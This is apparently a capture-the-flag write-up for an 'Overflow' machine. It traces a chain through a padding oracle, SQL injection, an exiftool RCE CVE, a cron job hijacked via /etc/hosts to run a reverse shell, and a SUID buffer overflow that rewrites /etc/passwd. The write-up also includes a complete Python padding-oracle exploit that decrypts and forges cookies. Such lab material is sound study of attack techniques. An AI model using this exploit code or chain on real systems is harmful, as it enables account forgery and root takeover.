Read my writeup for the Overflow machine:
TL;DR
User 1: Found a padding oracle on the auth cookie token. Using it, we forge an auth token for the admin user. Found SQLi on the logs API; using the SQLi we dump the editor password of the CMS Made Simple system. On the CMS we found another subdomain, devbuild-job.overflow.htb. On this subdomain we found an upload page; the web server validates the uploaded image with exiftool, and using CVE-2021-22204 (exiftool) we get RCE as the www-data user. In /var/www/html/config/db.php we found the password of the developer user.
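The padding-oracle step above in working form, as an added example that is not code from the original writeup: a toy CBC cookie service built on a stdlib-only Feistel block cipher (the real cookie's cipher and key are not on this page and are assumed here), a server-side oracle that leaks only whether PKCS#7 padding was valid, and an attacker that uses nothing but that one bit to decrypt an existing cookie and to forge a `user=admin` cookie without ever knowing the key.

```python
"""Padding-oracle attack on a CBC-encrypted auth cookie (constructed demo).
Assumptions (not from the writeup): a 16-byte-block Feistel cipher keyed with
HMAC-SHA256 stands in for the server's cipher; SERVER_KEY is unknown to the
attacker, who only ever calls oracle()."""
import hashlib
import hmac
import os

BLOCK = 16
SERVER_KEY = b"server-secret-key-not-known-to-attacker"  # assumption

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):
    """Feistel round function: keyed PRF of one 8-byte half."""
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, xor(l, _f(key, r, rnd))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _f(key, l, rnd)), l
    return l + r

def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, pt):
    out, prev = [iv], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)          # IV is shipped as the first block

def cbc_decrypt(key, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))

# --- server side -----------------------------------------------------------
def make_cookie(user):
    return cbc_encrypt(SERVER_KEY, os.urandom(BLOCK), pad(b"user=" + user))

def oracle(cookie):
    """The leak: the server reveals only whether the padding was valid."""
    try:
        unpad(cbc_decrypt(SERVER_KEY, cookie))
        return True
    except ValueError:
        return False

# --- attacker side: no key, only oracle() ----------------------------------
def recover_intermediate(block):
    """Recover D_k(block), the value the server XORs with the previous block."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos                      # padding value we aim for
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):         # already-known bytes -> padv
            forged[j] = inter[j] ^ padv
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + block):
                continue
            if pos == BLOCK - 1:
                # Rule out an accidental \x02\x02 (etc.) match: a genuine \x01
                # padding stays valid when the byte before it is changed.
                forged[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(forged) + block)
                forged[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("oracle never accepted a byte")
    return bytes(inter)

def decrypt_with_oracle(cookie):
    blocks = [cookie[i:i + BLOCK] for i in range(0, len(cookie), BLOCK)]
    return unpad(b"".join(xor(recover_intermediate(c), p) for p, c in zip(blocks, blocks[1:])))

def forge_with_oracle(plaintext):
    """Build a valid cookie for any plaintext, working backwards from a random last block."""
    pt = pad(plaintext)
    cur = os.urandom(BLOCK)
    out = [cur]
    for i in range(len(pt) - BLOCK, -1, -BLOCK):
        cur = xor(recover_intermediate(cur), pt[i:i + BLOCK])  # previous block / IV
        out.insert(0, cur)
    return b"".join(out)

if __name__ == "__main__":
    print(decrypt_with_oracle(make_cookie(b"guest")))   # b'user=guest'
    forged = forge_with_oracle(b"user=admin")
    print(unpad(cbc_decrypt(SERVER_KEY, forged)))       # b'user=admin'
```

The forge is the part that matters for the admin-token step: because every block's intermediate value can be recovered through the oracle, the attacker fixes a random final ciphertext block and chooses each preceding block (ending with the IV) so that the CBC XOR produces the plaintext they want, so no key is needed to mint a cookie the server accepts. The fix on the server side is to authenticate the ciphertext (AEAD or encrypt-then-MAC) and to return the same error for bad padding and bad MAC.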
User 2: By enumerating we found a file at /opt/commontask.sh which runs every minute as the tester user. This script tries to download a file task.sh from http://taskmanage.overflow.htb. By checking the permissions of /etc/hosts we can see that the developer user can edit it; using that we add a taskmanage.overflow.htb entry so that the name resolves to the box's own web server. As the www-data user we create a reverse shell at /var/www/html/task.sh, and when the cron job fetches and runs it we get a reverse shell as the tester user.
Root: Found a SUID binary /opt/file_encrypt/file_encrypt which XOR-encrypts an input file and writes the result to a target path as root. By reversing the binary we found a buffer overflow; using it we change the return address of the check_pin function to the encrypt function. By "encrypting" our own /etc/passwd file (which replaces the group of the developer user with root) with /etc/passwd as the target path, we log in as developer with root privileges.